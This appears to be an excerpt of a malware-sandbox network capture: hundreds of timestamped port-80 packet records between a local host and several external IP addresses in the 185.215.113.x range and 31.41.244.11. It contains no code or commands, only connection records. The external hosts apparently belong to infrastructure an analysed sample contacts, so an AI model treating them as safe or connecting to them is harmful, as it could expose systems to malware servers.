                                                  Nov 28, 2024 13:11:02.748414040 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.748461008 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.749459028 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.749563932 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.749924898 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.750009060 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.750596046 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.750672102 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.750690937 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.750721931 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.751804113 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.751852036 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.751888037 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.751888037 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.752895117 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.752947092 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.752990007 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.753079891 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.754024982 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.754138947 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.754152060 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.754192114 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.755146027 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.755240917 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.755251884 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.755300999 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.756267071 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.756377935 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.881334066 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.881414890 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.881561995 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.881839037 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.881934881 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.881984949 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.882071972 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.883074045 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.883132935 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.883152008 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.883198023 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.884244919 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.884331942 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.884391069 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.884475946 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.885576010 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.885663033 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.885667086 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.885715008 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.886603117 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.886660099 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.886691093 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.886750937 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.887510061 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.887553930 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.887598991 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.887649059 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.896995068 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.897090912 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.897113085 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.897135019 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.897490025 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.897563934 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.897602081 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.897682905 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.898639917 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.898684025 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.898741007 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.898807049 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.899764061 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.899820089 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.899879932 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.899962902 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.900904894 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.900959969 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.901010990 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.901123047 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.902056932 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.902178049 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.902187109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.902241945 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.903215885 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.903259993 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.903393030 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.903484106 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.904319048 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.904391050 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.904407024 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.904496908 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.905453920 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.905498028 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.905504942 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.905550957 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.906605959 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.906682014 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.906683922 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.906754971 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.907735109 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.907793045 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.907850981 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.907937050 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.908865929 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.908910990 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.909003973 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.909147978 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.910041094 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.910104990 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.910141945 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.910211086 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.911179066 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.911273003 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.911385059 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.911485910 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.912271023 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.912333965 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.912406921 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.912475109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.913438082 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.913554907 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.913564920 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.913642883 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.914566994 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.914609909 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.914694071 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.914747953 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.915743113 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.915869951 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.915883064 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.915942907 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.917377949 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.917454958 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.917606115 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.917663097 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.918553114 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.918615103 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.918713093 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.918772936 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.919601917 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.919656038 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.919734001 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.919785023 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.920754910 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.920838118 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.920850992 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.920874119 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.921824932 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.921900034 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.921945095 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.921974897 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.922652006 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.922692060 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.922760010 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.922808886 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.923676968 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.923728943 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.923809052 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.923880100 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.924827099 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.924880028 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.924968004 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.925017118 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.925981045 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.926071882 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.926071882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.926140070 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.927093029 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.927139997 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.927269936 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.928400993 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.928450108 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.928452015 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.928503036 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.929373026 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.929388046 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.929442883 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.930567026 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.930649996 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.930663109 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.930718899 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.931632996 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.931709051 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.931727886 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.931854010 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.932796001 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.932902098 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.932904959 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.932965040 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.933924913 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.933976889 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.934235096 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.934287071 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.935039997 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.935102940 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.935136080 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.935281038 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.936176062 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.936201096 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.936218977 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.936260939 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.937375069 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.937421083 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.937448025 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.937496901 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.938488960 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.938549995 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.938702106 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.938775063 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.939604998 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.939661980 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.939840078 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.939943075 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.940833092 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.940910101 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.940929890 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.940979004 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.941864014 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.941925049 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.941986084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.942047119 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.943062067 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.943137884 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.943161964 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.943206072 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.944154978 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.944224119 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.944271088 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.944329023 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.945384026 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.945461035 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.945508957 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.945574999 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.946614027 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.946666956 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.946687937 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.946747065 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.947645903 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.947700977 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.947763920 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.947819948 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.948761940 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.948851109 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.073621988 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.073666096 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.073729038 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.073745012 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.073837996 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.073915005 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.074834108 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.074940920 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.074973106 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.075021029 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.075997114 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.076059103 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.076105118 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.076173067 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.077091932 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.077178001 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.077198982 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.077253103 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.078213930 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.078305960 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.078341007 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.078401089 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.079322100 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.079448938 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.079464912 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.079504967 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.080409050 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.080600023 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.089054108 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.089087009 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.089169025 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.089555025 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.089586020 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.089652061 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.089729071 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.090698957 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.090728998 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.090750933 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.090775967 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.091828108 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.091921091 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.091933012 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.091985941 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.092978001 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.093028069 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.093133926 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.093231916 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.094140053 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.094199896 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.094213009 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.094261885 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.095292091 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.095403910 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.095448017 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.095448017 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.096381903 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.096509933 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.096510887 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.096563101 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.097542048 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.097604036 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.097639084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.097718954 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.098659992 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.098759890 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.098784924 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.098814011 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.099844933 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.099889040 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.099920034 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:03.099976063 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:03.397677898 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:03.398145914 CET4971180192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:03.517807961 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:11:03.518053055 CET8049711185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:11:03.519754887 CET4971180192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:03.519773960 CET4971180192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:03.639945030 CET8049711185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:11:05.353075981 CET8049711185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:11:05.353137016 CET4971180192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:08.264714003 CET4971180192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:08.264868975 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:12:05.403875113 CET4971480192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:05.523971081 CET8049714185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:05.524107933 CET4971480192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:05.524621010 CET4971480192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:05.644617081 CET8049714185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:06.964832067 CET8049714185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:06.964987040 CET4971480192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:08.474514008 CET4971480192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:08.474900961 CET4971580192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:08.594908953 CET8049715185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:08.594949961 CET8049714185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:08.595031977 CET4971580192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:08.595096111 CET4971480192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:08.595304966 CET4971580192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:08.715204954 CET8049715185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:10.002995968 CET8049715185.215.113.43192.168.2.8
                                                  Nov 28, 2024 13:12:10.003288984 CET4971580192.168.2.8185.215.113.43
                                                  Nov 28, 2024 13:12:10.010854006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:10.131032944 CET804971631.41.244.11192.168.2.8
